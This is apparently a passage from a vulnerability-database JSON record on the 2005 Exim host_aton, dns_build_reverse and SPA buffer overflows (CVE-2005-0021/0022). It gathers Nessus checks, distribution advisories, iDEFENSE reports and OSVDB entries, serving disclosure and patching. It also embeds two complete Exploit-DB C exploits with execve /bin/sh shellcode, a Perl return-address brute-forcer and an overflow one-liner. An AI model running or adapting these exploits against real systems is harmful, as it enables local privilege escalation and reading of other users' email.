script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"exim-tls\", reference:\"3.35-3woody3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:08:19", "bulletinFamily": "scanner", "description": "Philip Hazel announced a buffer overflow in the host_aton function in exim, the default mail-transport-agent in Debian, which can lead to the execution of arbitrary code via an illegal IPv6 address.", "modified": "2018-08-09T00:00:00", "id": "DEBIAN_DSA-635.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16132", "published": "2005-01-12T00:00:00", "title": "Debian DSA-635-1 : exim - buffer overflow", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-635. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16132);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/08/09 17:06:36\");\n\n script_cve_id(\"CVE-2005-0021\");\n script_xref(name:\"DSA\", value:\"635\");\n\n script_name(english:\"Debian DSA-635-1 : exim - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Philip Hazel announced a buffer overflow in the host_aton function in\nexim, the default mail-transport-agent in Debian, which can lead to\nthe execution of arbitrary code via an illegal IPv6 address.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=289046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-635\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the exim and exim4 packages.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 3.35-1woody4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/01/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 
Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"exim\", reference:\"3.35-1woody4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"eximon\", reference:\"3.35-1woody4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:35", "bulletinFamily": "unix", "description": "### Background\n\nExim is a highly configurable message transfer agent (MTA) developed at the University of Cambridge. \n\n### Description\n\nBuffer overflows have been found in the host_aton() function (CAN-2005-0021) as well as in the spa_base64_to_bits() function (CAN-2005-0022), which is part of the SPA authentication code. \n\n### Impact\n\nA local attacker could trigger the buffer overflow in host_aton() by supplying an illegal IPv6 address with more than 8 components, using a command line option. The second vulnerability could be remotely exploited during SPA authentication, if it is enabled on the server. Both buffer overflows can potentially lead to the execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll Exim users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/exim-4.43-r2\"", "modified": "2005-01-12T00:00:00", "published": "2005-01-12T00:00:00", "id": "GLSA-200501-23", "href": "https://security.gentoo.org/glsa/200501-23", "type": "gentoo", "title": "Exim: Two buffer overflows", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T17:41:09", "bulletinFamily": "unix", "description": "Exim is a mail transport agent (MTA) developed at the University of\nCambridge for use on Unix systems connected to the Internet. \n\nA buffer overflow was discovered in the spa_base64_to_bits function in\nExim, as originally obtained from Samba code. If SPA authentication is\nenabled, a remote attacker may be able to exploit this vulnerability to\nexecute arbitrary code as the 'exim' user. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2005-0022 to\nthis issue. Please note that SPA authentication is not enabled by default\nin Red Hat Enterprise Linux 4.\n\nBuffer overflow flaws were discovered in the host_aton and\ndns_build_reverse functions in Exim. A local user can trigger these flaws\nby executing exim with carefully crafted command line arguments and may be\nable to gain the privileges of the 'exim' account. 
The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2005-0021 to this issue.\n\nUsers of Exim are advised to update to these erratum packages which contain\nbackported patches to correct these issues.", "modified": "2017-09-08T12:18:48", "published": "2005-02-15T05:00:00", "id": "RHSA-2005:025", "href": "https://access.redhat.com/errata/RHSA-2005:025", "type": "redhat", "title": "(RHSA-2005:025) exim security update", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:22:05", "bulletinFamily": "exploit", "description": "Exim <= 4.41 dns_build_reverse Local Exploit. CVE-2005-0021. Local exploit for linux platform", "modified": "2005-05-25T00:00:00", "published": "2005-05-25T00:00:00", "id": "EDB-ID:1009", "href": "https://www.exploit-db.com/exploits/1009/", "type": "exploitdb", "title": "Exim <= 4.41 dns_build_reverse Local Exploit", "sourceData": "/* \r\n * ripped straight off iDEFENSE advisory - so lazy I just picked\r\n * up GDB... bored on a weeknight :(\r\n * \r\n * nothing to write home to mother about due to the fact that\r\n * you need a local user account on a server and all you\r\n * get is to read other people's emails ....\r\n * \r\n * not even my own shellcode. 
aleph1 shellcode - cut and paste job \r\n * with nops to pad.\r\n *\r\n * Regards,\r\n * Plugger aka Tony Lockett\r\n *\r\n * \r\n * \r\n */\r\n\r\nchar bomb[288]=\r\n\r\n/* the gear from iDEFENSE */\r\n\"::%A:::::::::::::::::\" /* 21 bytes */\r\n /* -------- */\r\n/* NOPS for padding */\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\" /* 218 bytes */\r\n /* --------- */\r\n/* actual code courtesy Aleph1 */\r\n\"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\" /* 12 bytes */\r\n\"\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\" /* 12 bytes */\r\n\"\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\" /* 9 bytes */\r\n\"\\xe8\\xdc\\xff\\xff\\xff/bin/sh\" /* 12 bytes */\r\n\r\n/* where EIP should point */\r\n\"\\xf4\\xf2\\xff\\xbf\"; /* 4 bytes */\r\n /* -------- */\r\n /* 49 
bytes */\r\n /* -------- */\r\n /* 288 bytes */\r\n /* ========= */\r\nmain()\r\n{\r\n char *exim[4];\r\n exim[0] = \"/usr/exim/bin/exim\";\r\n exim[1] = \"-bh\";\r\n exim[2] = bomb;\r\n exim[3] = 0x0;\r\n printf(\"Firing up exim - cross your fingers for shell!\\n\");\r\n execve(exim[0],exim,0x0);\r\n return;\r\n}\n\n// milw0rm.com [2005-05-25]\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1009/"}, {"lastseen": "2016-01-31T12:48:04", "bulletinFamily": "exploit", "description": "Exim <= 4.41 dns_build_reverse Local Exploit PoC. CVE-2005-0021. Local exploit for linux platform", "modified": "2005-01-15T00:00:00", "published": "2005-01-15T00:00:00", "id": "EDB-ID:756", "href": "https://www.exploit-db.com/exploits/756/", "type": "exploitdb", "title": "Exim <= 4.41 dns_build_reverse Local Exploit PoC", "sourceData": "/*\r\nThis proof-of-concept demonstrates the existence of the vulnerability\r\nreported by iDEFENSE (iDEFENSE Security Advisory 01.14.05).\r\nIt has been tested against exim-4.41 under Debian GNU/Linux.\r\nNote that setuid () is not included in the shellcode to avoid\r\nscript-kidding.\r\nMy RET is 0xbffffae4, but fb.pl can brute-force it for you.\r\n\r\n-----------\r\nBrute Force fb.pl:\r\n-----------\r\n\r\n#!/usr/bin/perl\r\n\r\n$cnt = 0xbffffa10;\r\n\r\nwhile (1) {\r\n $hex = sprintf (\"0x%x\", $cnt);\r\n $res = system (\"./exploit $hex\");\r\n printf \"$hex : $res\\n\";\r\n $cnt += 4;\r\n}\r\n\r\n---------\r\nexploit.c:\r\n---------\r\n*/\r\n\r\n#define NOP 0x90\r\n#define TAMBUF 368\r\n#define INIC_SH 20\r\n#include <stdlib.h>\r\n\r\nint main (int argc, char **argv) {\r\n\r\n static char shellcode[]=\r\n \"\\xeb\\x17\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\"\r\n \"\\xf3\\x8d\\x4e\\x08\\x31\\xd2\\xcd\\x80\\xe8\\xe4\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\"\r\n \"\\x2f\\x73\\x68\\x58\";\r\n\r\n char buffer [TAMBUF + 
1];\r\n char cadena [TAMBUF + 5];\r\n int cont;\r\n unsigned long ret = strtoul (argv[1], NULL, 16);\r\n\r\n for (cont = 0; cont < TAMBUF / 4; cont++)\r\n *( (long *) buffer + cont) = ret;\r\n\r\n for (cont = 0; cont < strlen (shellcode); cont++)\r\n buffer [cont + INIC_SH] = shellcode [cont];\r\n\r\n for (cont = 0; cont < INIC_SH; cont++)\r\n buffer [cont] = NOP;\r\n\r\n buffer [TAMBUF] = 0;\r\n printf (\"RET = 0x%x\\n\", ret);\r\n strcpy (cadena, \"::%A\");\r\n strcat (cadena, buffer);\r\n execl (\"/usr/sbin/exim\", \"./exim\", \"-bh\", cadena, (char *) 0);\r\n}\r\n\r\n// milw0rm.com [2005-01-15]\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/756/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "description": "## Vulnerability Description\nA local overflow exists in Exim. Exim fails to check the length of a string resulting in a buffer overflow in the dns_build_reverse() function. Exim drops SUID privileges before the vulnerable code is reached. With a specially crafted request, an attacker can further escalate privileges or retrieve the mailer uid to access email messages, resulting in a loss of integrity and confidentiality.\n## Solution Description\nUpgrade to version 4.44 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA local overflow exists in Exim. Exim fails to check the length of a string resulting in a buffer overflow in the dns_build_reverse() function. Exim drops SUID privileges before the vulnerable code is reached. 
With a specially crafted request, an attacker can further escalate privileges or retrieve the mailer uid to access email messages, resulting in a loss of integrity and confidentiality.\n## Manual Testing Notes\n/usr/bin/exim -bh ::%A`perl -e 'print pack('L',0xdeadbeef') x 256'`\n## References:\nVendor URL: http://www.exim.org/\nSecurity Tracker: 1012904\nOther Advisory URL: http://www.idefense.com/application/poi/display?id=183&type=vulnerabilities\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-01/0170.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-01/0178.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-05/0282.html\nGeneric Exploit URL: http://www.securiteam.com/exploits/5WP0R1PFPM.html\n[CVE-2005-0021](https://vulners.com/cve/CVE-2005-0021)\n", "modified": "2005-01-14T17:32:26", "published": "2005-01-14T17:32:26", "href": "https://vulners.com/osvdb/OSVDB:12946", "id": "OSVDB:12946", "type": "osvdb", "title": "Exim dns_build_reverse() Local Overflow", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in Exim. Exim fails to properly check input to host_aton() resulting in a buffer overflow. With a specially crafted request of an IPv6 address with more than 8 components, an attacker can cause execution of arbitrary code resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Exim has released a patch to address this vulnerability.\n## Short Description\nA remote overflow exists in Exim. Exim fails to properly check input to host_aton() resulting in a buffer overflow. 
With a specially crafted request of an IPv6 address with more than 8 components, an attacker can cause execution of arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.exim.org\n[Vendor Specific Advisory URL](http://www.debian.org/security/2005/dsa-635)\nSecurity Tracker: 1012771\n[Secunia Advisory ID:13713](https://secuniaresearch.flexerasoftware.com/advisories/13713/)\n[Secunia Advisory ID:13817](https://secuniaresearch.flexerasoftware.com/advisories/13817/)\n[Secunia Advisory ID:13823](https://secuniaresearch.flexerasoftware.com/advisories/13823/)\n[Secunia Advisory ID:13853](https://secuniaresearch.flexerasoftware.com/advisories/13853/)\n[Related OSVDB ID: 12727](https://vulners.com/osvdb/OSVDB:12727)\nOther Advisory URL: http://www.debian.org/security/2005/dsa-637\nOther Advisory URL: http://www.idefense.com/application/poi/display?id=178&type=vulnerabilities\nOther Advisory URL: http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200501-23.xml\n[Nessus Plugin ID:16111](https://vulners.com/search?query=pluginID:16111)\n[CVE-2005-0021](https://vulners.com/cve/CVE-2005-0021)\n", "modified": "2005-01-06T08:11:29", "published": "2005-01-06T08:11:29", "href": "https://vulners.com/osvdb/OSVDB:12726", "id": "OSVDB:12726", "type": "osvdb", "title": "Exim host_aton Command Line Overflow", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in Exim. Exim fails to have sufficient boundary checks in the 'spa_base64_to_bits()' function resulting in a buffer overflow. 
With a specially crafted request, an attacker can execute arbitrary code in the context of the affected application resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, University of Cambridge and RedHat have released a patch to address this vulnerability.\n## Short Description\nA remote overflow exists in Exim. Exim fails to have sufficient boundary checks in the 'spa_base64_to_bits()' function resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code in the context of the affected application resulting in a loss of integrity.\n## References:\nSecurity Tracker: 1012771\n[Secunia Advisory ID:13713](https://secuniaresearch.flexerasoftware.com/advisories/13713/)\n[Secunia Advisory ID:13823](https://secuniaresearch.flexerasoftware.com/advisories/13823/)\n[Related OSVDB ID: 12726](https://vulners.com/osvdb/OSVDB:12726)\nOther Advisory URL: http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\nOther Advisory URL: http://www.idefense.com/application/poi/display?id=178&type=vulnerabilities&flashstatus=true\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200501-23.xml\n[Nessus Plugin ID:16111](https://vulners.com/search?query=pluginID:16111)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0214.html\n[CVE-2005-0022](https://vulners.com/cve/CVE-2005-0022)\nBugtraq ID: 12188\n", "modified": "2005-01-06T08:11:29", "published": "2005-01-06T08:11:29", "href": "https://vulners.com/osvdb/OSVDB:12727", "id": "OSVDB:12727", "type": "osvdb", "title": "Exim auth_spa_server Remote Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "Exim auth_spa_server() Buffer Overflow Vulnerability \r\n\r\niDEFENSE Security Advisory 
[IDEF0731]\r\nwww.idefense.com/application/poi/display?id=178&type=vulnerabilities\r\nJanuary 07, 2004\r\n\r\nI. BACKGROUND\r\n\r\nExim is a message transfer agent developed for use on Unix systems. More\r\n\r\ninformation is available at: \r\n\r\n http://www.exim.org/\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a buffer overflow vulnerability in Exim 4.41 may\r\nallow execution of arbitrary commands with elevated privileges.\r\n\r\nExim is a message transfer agent developed for use on Unix systems. The \r\nproblem specifically exists in the auth_spa_server function. The \r\nfunction fails to check the length of input to spa_base64_to_bits(), \r\nwhich decodes a Base64-encoded string into a buffer of a fixed length. \r\nThis string is user-controlled and passed to the program from a remote \r\nconnection.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability will give an attacker remote access \r\nto the mailer uid. The exim mailer is setuid root, but drops privileges \r\nbefore the vulnerable code is reached. A remote attacker may be able to \r\nuse other vulnerabilities to further elevate their privileges.\r\n\r\nThis vulnerability is only exploitable when the spa authentication \r\nmethod has been configured by setting AUTH_SPA=yes in Local/Makefile \r\nwhen building it.\r\n\r\nIV. DETECTION\r\n\r\nExim versions 4.40 and 4.41 have been confirmed vulnerable. The source \r\ncode for version 4.42 suggests that it is vulnerable. It is suspected \r\nthat previous versions are also vulnerable.\r\n\r\nTo determine if the Exim version being used is vulnerable, connect to\r\nport 25 of the machine with Exim installed and type:\r\n\r\n EHLO localhost\r\n\r\nIf AUTH NTLM appears in the output the application may be vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\niDEFENSE is currently unaware of any effective workarounds for this \r\nvulnerability.\r\n\r\nVI. 
VENDOR RESPONSE\r\n\r\nA patch for Exim release 4.43 which addresses this vulnerability is\r\navailable at:\r\n\r\n http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\r\n\r\nThe patch will be incorporated into a future Exim release (4.50).\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nnames CAN-2005-0022 to these issues. This is a candidate for inclusion\r\nin the CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n12/23/2004 Initial vendor notification\r\n12/29/2004 Initial vendor response\r\n01/07/2004 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/poi/teams/vcp.jsp\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright (c) 2004 iDEFENSE, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDEFENSE. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. 
Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.", "modified": "2005-01-08T00:00:00", "published": "2005-01-08T00:00:00", "id": "SECURITYVULNS:DOC:7534", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7534", "title": "iDEFENSE Security Advisory [IDEF0731] Exim auth_spa_server() Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "Exim host_aton() Buffer Overflow Vulnerability\r\n\r\niDEFENSE Security Advisory [IDEF0725]\r\nhttp://www.idefense.com/application/poi/display?type=vulnerabilities\r\nJanuary 07, 2005\r\n\r\nI. BACKGROUND\r\n\r\nExim is a message transfer agent developed for use on Unix systems. More\r\n\r\ninformation is available at: \r\n\r\n http://www.exim.org/\r\n\r\nII. DESCRIPTION\r\n\r\nLocal exploitation of a buffer overflow vulnerability in Exim 4.41 may \r\nallow execution of arbitrary commands with elevated privileges.\r\n\r\nThe problem specifically exists in the host_aton function. The function \r\nfails to check the number of elements it stores in a fixed size array. \r\nThe elements come from a user-controlled string and are passed into the \r\nprogram from a command line option.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability will give an attacker access to the \r\nmailer uid. The exim mailer is setuid root, but drops privileges before \r\nthe vulnerable code is reached. Having the mailer uid may allow access \r\nto sensitive information in e-mail messages or possibly further \r\nelevation.\r\n\r\nIV. DETECTION\r\n\r\nExim versions 4.40 and 4.41 have been confirmed vulnerable. The source \r\ncode for version 4.42 suggests that it is also vulnerable. 
It is \r\nsuspected that previous versions are vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\niDEFENSE is currently unaware of any effective workarounds for this \r\nvulnerability.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nA patch for Exim release 4.43 which addresses this vulnerability is\r\navailable at:\r\n\r\n http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\r\n\r\nThe patch will be incorporated into a future Exim release (4.50).\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nnames CAN-2005-0021 to these issues. This is a candidate for inclusion\r\nin the CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n12/23/2004 Initial vendor notification\r\n12/29/2004 Initial vendor response\r\n01/07/2005 Public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/poi/teams/vcp.jsp\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright (c) 2004 iDEFENSE, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDEFENSE. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. 
Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.", "modified": "2005-01-08T00:00:00", "published": "2005-01-08T00:00:00", "id": "SECURITYVULNS:DOC:7533", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7533", "title": "iDEFENSE Security Advisory [IDEF0725] Exim host_aton() Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:12:54", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 635-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJanuary 12th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : exim\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2005-0021\nDebian Bug : 289046\n\nPhilip Hazel announced a buffer overflow in the host_aton function in\nexim, the default mail-tranport-agent in Debian, which can lead to the\nexecution of arbitrary code via an illegal IPv6 address.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 3.35-1woody4.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 3.36-13 of exim and 4.34-10 of exim4.\n\nWe recommend that you upgrade your exim and exim4 packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources 
from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4.dsc\n Size/MD5 checksum: 661 d97ecab579bd3dbaa3e9be00b8b16d85\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4.diff.gz\n Size/MD5 checksum: 80195 a02abeefa9d1145ae623ad661aab5f5a\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35.orig.tar.gz\n Size/MD5 checksum: 1271057 42d362e40a21bd7ffc298f92c8bd986a\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_alpha.deb\n Size/MD5 checksum: 872796 a46f5dc95d777366cb492eb57ec8dd9f\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_alpha.deb\n Size/MD5 checksum: 52318 bf93e35aec9f401d8413015c50f5cbae\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_arm.deb\n Size/MD5 checksum: 785980 5ced90e4c4ecd1ca6a60980634b309e8\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_arm.deb\n Size/MD5 checksum: 43514 07b7324395ff66f68db354c6b4589db7\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_i386.deb\n Size/MD5 checksum: 759270 9001a456b0a34f4bf5de88d901c70a97\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_i386.deb\n Size/MD5 checksum: 39210 